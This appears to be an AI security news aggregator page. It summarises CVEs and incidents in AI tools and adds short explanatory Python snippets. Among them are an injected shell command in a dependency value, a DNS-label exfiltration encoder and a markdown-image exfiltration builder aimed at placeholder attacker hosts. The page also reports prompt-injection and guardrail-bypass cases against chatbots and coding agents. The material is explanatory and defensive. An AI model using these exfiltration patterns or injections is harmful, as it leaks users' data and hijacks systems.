aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. AI Sec Watch was built by an Information Systems security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,677
Last 24 hours: 25
Last 7 days: 167
Daily Briefing: Monday, March 30, 2026

Anthropic's Unreleased Cybersecurity Model Accidentally Exposed: A configuration error leaked details of Anthropic's powerful new AI model called Mythos, designed for cybersecurity use cases with advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The leak raises concerns because the model's improved vulnerability detection could enable more sophisticated cyberattacks, prompting Anthropic to plan a phased rollout to enterprise security teams first.


Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where attackers insert malicious commands into input that gets executed) in its model serving code when using `env_manager=LOCAL`, allowing attackers to execute arbitrary commands by manipulating dependency information in the `python_env.yaml` file without any safety checks. (CVE-2025-15379, Critical)
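The vulnerability class behind this entry is easy to sketch. The following is an illustrative Python example of the pattern, not MLflow's actual code: when dependency strings read from an attacker-controlled YAML file are interpolated into a shell command string, any shell metacharacters in them become extra commands, whereas passing them as an argv list keeps each string a single argument.

```python
# Hypothetical sketch of the command-injection class described above
# (function names are illustrative, not MLflow internals).

def install_deps_unsafe(deps):
    # Vulnerable pattern: building one shell string. A "dependency" like
    # "numpy; touch /tmp/pwned" smuggles in a second command.
    return "pip install " + " ".join(deps)  # shown, never executed here

def install_deps_safe(deps):
    # Safer pattern: an argv list passed without a shell. Each dependency
    # stays a single argument; the injected text is just an invalid
    # package name that pip rejects.
    return ["pip", "install", *deps]

malicious = ["numpy; touch /tmp/pwned"]
print(install_deps_unsafe(malicious))  # shell would see two commands
print(install_deps_safe(malicious))    # pip sees one bogus argument
```

The fix pattern matches standard hardening advice: never hand untrusted strings to a shell; use argument vectors and validate dependency specifiers against a strict grammar before use.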

Latest Intel

01

CVE-2023-38975: Buffer overflow vulnerability in qdrant v.1.3.2 allows a remote attacker to cause a denial of service via the chunked_vectors component

security
Aug 29, 2023

A buffer overflow vulnerability (a memory safety flaw where data is written beyond allocated space) in Qdrant version 1.3.2 allows remote attackers to cause a denial of service (making the service unavailable) through the chunked_vectors component. The vulnerability has a CVSS score of 4.0, indicating moderate severity.

Critical This Week (5 issues)

critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code …

CVE-2025-15379 | NVD/CVE Database | Mar 30, 2026

Multiple High-Severity Flaws in AI Agent Frameworks: CrewAI has several vulnerabilities including Docker fallback issues that enable RCE (remote code execution, where attackers run commands on systems they don't control) when containerization fails (CVE-2026-2287, CVE-2026-2275), while OpenClaw suffers from malicious plugin code execution during installation and sandbox bypass flaws that let agents access other agents' workspaces. SakaDev and HAI Build Code Generator can both be tricked through prompt injection (hiding malicious instructions in normal-looking input) to misclassify dangerous terminal commands as safe and execute them automatically (CVE-2026-30306, CVE-2026-30308).
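The common thread in the SakaDev and HAI Build flaws is letting an LLM decide whether a terminal command is "safe," a decision prompt injection can flip. A minimal defensive sketch (not code from any of the named frameworks): a deterministic allowlist check that injected text cannot talk its way past.

```python
# Illustrative hardening sketch: classify commands with a fixed allowlist
# instead of an LLM verdict. SAFE_COMMANDS and the forbidden-character
# set are assumptions for the example, not any framework's policy.
import shlex

SAFE_COMMANDS = {"ls", "pwd", "whoami", "git"}
FORBIDDEN_CHARS = set(";|&`$><")  # shell operators that chain commands

def is_command_allowed(command_line: str) -> bool:
    # Reject shell metacharacters anywhere in the raw string first,
    # so "git status; rm -rf /" cannot hide behind an allowed binary.
    if any(ch in FORBIDDEN_CHARS for ch in command_line):
        return False
    try:
        argv = shlex.split(command_line)
    except ValueError:
        return False  # unparseable input is rejected outright
    return bool(argv) and argv[0] in SAFE_COMMANDS

print(is_command_allowed("ls -la"))       # True
print(is_command_allowed("rm -rf /"))     # False: binary not allowlisted
```

Unlike an LLM classifier, this check has no prompt to inject into; its failure mode is over-blocking, which is the safer direction for autonomous execution.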


ChatGPT Data Leakage Vulnerability Patched: OpenAI fixed a vulnerability that allowed attackers to secretly extract sensitive user data including conversation messages and uploaded files by exploiting a hidden DNS-based communication channel (covert data transmission using the Domain Name System) in ChatGPT's Linux runtime, bypassing all safety guardrails designed to prevent unauthorized data sharing.
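To make the DNS covert channel concrete, here is a hedged sketch of the general technique (not OpenAI's code and no actual network traffic): the exfiltrated data is hex-encoded and split into DNS labels, so each lookup of `<chunk>.attacker-domain` leaks a fragment to whoever runs that domain's nameserver.

```python
# Illustrative encoding only: shows why ordinary DNS lookups can carry
# data. The attacker domain is a placeholder; nothing is resolved here.
def encode_for_dns(secret: str, attacker_domain: str, label_len: int = 60):
    hex_data = secret.encode().hex()  # DNS-safe characters only
    labels = [hex_data[i:i + label_len]
              for i in range(0, len(hex_data), label_len)]
    # Each label stays under the 63-character DNS label limit.
    return [f"{label}.{attacker_domain}" for label in labels]

def decode_from_dns(names):
    # What the attacker's nameserver reconstructs from query logs.
    hex_data = "".join(name.split(".")[0] for name in names)
    return bytes.fromhex(hex_data).decode()

names = encode_for_dns("api_key=sk-123", "exfil.example")
print(names[0])
print(decode_from_dns(names))  # round-trips the secret
```

This is why DNS egress from sandboxed runtimes is a guardrail-bypass risk: resolution often happens even when HTTP egress is blocked, and the queries look like routine infrastructure traffic.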

NVD/CVE Database
02

Video: Data Exfiltration Vulnerabilities in LLM apps (Bing Chat, ChatGPT, Claude)

security
Aug 28, 2023

A researcher discovered data exfiltration vulnerabilities (security flaws that allow unauthorized data to leak out of a system) in several popular AI chatbots including Bing Chat, ChatGPT, and Claude, and responsibly disclosed them to the companies. Microsoft, Anthropic, and a plugin vendor fixed their vulnerabilities, but OpenAI decided not to fix an image markdown injection issue (a vulnerability where hidden code in image formatting can trick the AI into revealing data).

Fix: Microsoft (Bing Chat), Anthropic (Claude), and a plugin vendor patched their respective vulnerabilities. OpenAI's response to the report was "won't fix," so no OpenAI mitigation is described in the source.

Embrace The Red
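The image markdown injection technique from this entry can be illustrated in a few lines. This is a hedged sketch of the attack shape, with a placeholder attacker domain: if a chat UI auto-renders markdown images in model output, an attacker-influenced response can embed an image URL whose query string carries conversation data, which the browser then sends when it fetches the "image."

```python
# Sketch of the exfiltration payload shape (placeholder domain, not a
# real endpoint): the stolen text rides in the image URL's query string.
from urllib.parse import quote

def build_exfil_markdown(stolen_text: str) -> str:
    url = "https://attacker.example/log?d=" + quote(stolen_text)
    return f"![img]({url})"

payload = build_exfil_markdown("user said: my password is hunter2")
print(payload)
# Mitigations seen in patched clients: render images only through an
# allowlisted proxy, or refuse to render attacker-influenced URLs.
```

The vulnerability lies entirely in the rendering client, which is why fixes landed per-vendor rather than in any shared component.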
03

CVE-2023-36281: An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via a JSON file passed to load_prompt

security
Aug 22, 2023

LangChain version 0.0.171 has a vulnerability (CVE-2023-36281) that allows a remote attacker to execute arbitrary code (run commands they shouldn't be able to run) by sending a specially crafted JSON file to the load_prompt function. The vulnerability relates to improper control of code generation, which means the application doesn't properly validate or sanitize (clean) the input before using it to create executable code.

NVD/CVE Database
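A defensive sketch for this class of bug: prompt files can declare a template engine whose rendering executes code, so a loader should validate the declared format before doing anything else. The schema and field names below are assumptions for illustration, not LangChain's actual API or fix.

```python
# Hypothetical validation layer in front of a prompt-file loader:
# only plain f-string substitution is accepted; anything declaring a
# programmable template engine is rejected before loading.
import json

ALLOWED_FORMATS = {"f-string"}  # assumption: no code-executing engines

def validate_prompt_file(raw_json: str) -> dict:
    spec = json.loads(raw_json)
    fmt = spec.get("template_format", "f-string")
    if fmt not in ALLOWED_FORMATS:
        raise ValueError(f"refusing template_format {fmt!r}")
    return spec

safe = validate_prompt_file('{"template": "Hello {name}"}')
print(safe["template"])
try:
    validate_prompt_file('{"template": "x", "template_format": "jinja2"}')
except ValueError as e:
    print("blocked:", e)
```

The general lesson matches the CVE's CWE classification: treat a loaded prompt file as untrusted input that can steer code generation, not as inert configuration.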
04

CVE-2023-38976: An issue in weaviate v.1.20.0 allows a remote attacker to cause a denial of service via the handleUnbatchedGraphQLRequest function

security
Aug 21, 2023

Weaviate v.1.20.0 contains a vulnerability (CVE-2023-38976) in the handleUnbatchedGraphQLRequest function that allows remote attackers to cause a denial of service (making a service unavailable by overwhelming it with requests). The vulnerability has a CVSS score of 4.0 (a moderate severity rating).

NVD/CVE Database
05

CVE-2023-39659: An issue in langchain langchain-ai v.0.0.232 and before allows a remote attacker to execute arbitrary code via a crafted script passed to PythonAstREPLTool._run

security
Aug 15, 2023

CVE-2023-39659 is a vulnerability in langchain (an AI library) version 0.0.232 and earlier that allows a remote attacker to execute arbitrary code (run commands they choose) by sending a specially crafted script to the PythonAstREPLTool._run component. The vulnerability is caused by improper neutralization of special elements in output (a type of injection attack where untrusted input is not properly filtered before being processed).

NVD/CVE Database
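The root cause in this entry and the related LangChain CVEs is the same: model-generated strings reaching `exec`/`eval`, which run with full interpreter privileges. A common hardening pattern, sketched here as an illustration rather than langchain's actual fix, is an AST walker that evaluates only arithmetic expressions and rejects every other node type.

```python
# Minimal safe-evaluator sketch: parse the expression, then walk the AST
# allowing only numeric constants and basic arithmetic. Calls, attribute
# access, imports, etc. all fall through to the ValueError.
import ast
import operator

OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
       ast.Mult: operator.mul, ast.Div: operator.truediv,
       ast.USub: operator.neg}

def safe_eval(expr: str):
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in OPS:
            return OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in OPS:
            return OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"disallowed node: {type(node).__name__}")
    return walk(ast.parse(expr, mode="eval"))

print(safe_eval("2 * (3 + 4)"))  # 14
try:
    safe_eval("__import__('os').system('id')")
except ValueError as e:
    print("blocked:", e)
```

An allowlist over AST node types fails closed: new attack techniques hit the "disallowed node" branch by default instead of requiring a new denylist entry.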
06

CVE-2023-38896: An issue in Harrison Chase langchain v.0.0.194 and before allows a remote attacker to execute arbitrary code via the from_math_prompt and from_colored_object_prompt functions

security
Aug 15, 2023

CVE-2023-38896 is a vulnerability in langchain v.0.0.194 and earlier versions that allows a remote attacker to execute arbitrary code (run commands on a system they don't control) through the from_math_prompt and from_colored_object_prompt functions. This is an injection attack (CWE-74), where the software fails to properly filter special characters or commands that could be misused by downstream components.

Fix: A patch is available at https://github.com/hwchase17/langchain/pull/6003. Users should update langchain to a version after v.0.0.194.

NVD/CVE Database
07

CVE-2023-38860: An issue in LangChain v.0.0.231 allows a remote attacker to execute arbitrary code via the prompt parameter.

security
Aug 15, 2023

LangChain version 0.0.231 has a vulnerability (CVE-2023-38860) where a remote attacker can execute arbitrary code by manipulating the prompt parameter, which is a type of code injection (CWE-94, where an attacker tricks the system into running malicious code by hiding it in input data).

NVD/CVE Database
08

CVE-2023-27506: Improper buffer restrictions in the Intel(R) Optimization for Tensorflow software before version 2.12 may allow an authenticated user to potentially enable escalation of privilege via local access

security
Aug 11, 2023

CVE-2023-27506 is a vulnerability in Intel Optimization for Tensorflow software before version 2.12 involving improper buffer restrictions (a memory safety flaw where a program doesn't properly check that it stays within allocated memory). An authenticated user with local access to a system could potentially use this flaw to escalate their privileges, gaining higher-level access than they should have.

Fix: Update Intel Optimization for Tensorflow to version 2.12 or later.

NVD/CVE Database
09

CVE-2023-36095: An issue in Harrison Chase langchain v.0.0.194 allows an attacker to execute arbitrary code via the Python exec calls in PALChain's from_math_prompt and from_colored_object_prompt functions

security
Aug 5, 2023

LangChain (an AI framework for building applications with language models) version 0.0.194 contains a code injection vulnerability (CWE-94, a weakness where attackers can inject malicious code into a program) that allows attackers to execute arbitrary code through the PALChain component, specifically in the from_math_prompt and from_colored_object_prompt functions that use Python's exec command.

NVD/CVE Database
10

Anthropic Claude Data Exfiltration Vulnerability Fixed

securitysafety
Aug 1, 2023

Anthropic patched a data exfiltration vulnerability in Claude caused by image markdown injection, a technique where attackers embed hidden instructions in image links to trick the AI into leaking sensitive information. While Microsoft fixed this vulnerability in Bing Chat and OpenAI chose not to address it in ChatGPT, Anthropic implemented a mitigation to protect Claude users from this attack.

Embrace The Red
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis…

CVE-2026-33873 | NVD/CVE Database | Mar 27, 2026

critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO Online | Mar 27, 2026

critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521 | CISA Known Exploited Vulnerabilities | Mar 26, 2026

critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputer | Mar 26, 2026